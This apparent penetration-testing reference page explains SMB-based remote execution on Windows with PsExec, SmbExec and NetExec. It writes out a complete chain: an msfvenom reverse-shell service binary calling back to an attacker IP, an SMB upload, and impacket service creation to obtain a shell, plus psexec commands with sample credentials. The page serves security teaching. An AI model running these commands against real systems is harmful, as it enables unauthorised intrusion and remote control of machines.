SMB-based

Theory

SMB Protocol can be abuse by attackers to execute remote code and perform lateral movements.

Practice

PsExec

Psexec is one of many Sysinternals Tools and can be downloaded here, It connect to the $ADMIN shares with SMB and upload a service binary. Psexec uses psexesvc.exe as the name. Then it connect to the service control manager to create and run a service named PSEXESVC associated with the previous binary. Finally Psexec create some named pipes to handle stdin/stdout/stderr.

psexec.py username:[email protected] cmd.exe

# Create an exe as a service
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKING_IP> LPORT=<PORT> -f exe-service --platform windows -e x64/xor_dynamic  -o shell.exe

# Upload the exe to windows machine
smbclient '\\<TARGET>\smbshare' -U <user> -c "put shell.exe test.exe"

# Using impacket services.py create service remotely
services.py WORKGROUP/<user>@<TARGET> create -name shell-svc -display my-shell-svc -path "\\\\<TARGET>\\smbshare\\shell.exe"

# Using impacket services.py start the service and get the shell
services.py WORKGROUP/<user>@<TARGET> start -name shell-svc

#Run PsExec
psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe

SmbExec

SmbExec is an Impacket script that works similarly to PsExec without using RemComSvc. The main difference is that smbexec avoids transferring a potentially detectable binary to the target site. Instead, it lives completely off the land by running the local Windows command shell. implementation goes one step further, instantiating a local smbserver to receive the output of the commands. This is useful in the situation where the target machine does NOT have a writeable share available.

NetExec

You can utilize NetExec as a powerful alternative to SMBexec or PsExec for executing code over SMB connections. You can specify the execution methode and the shell interpretor (cmd or powershell.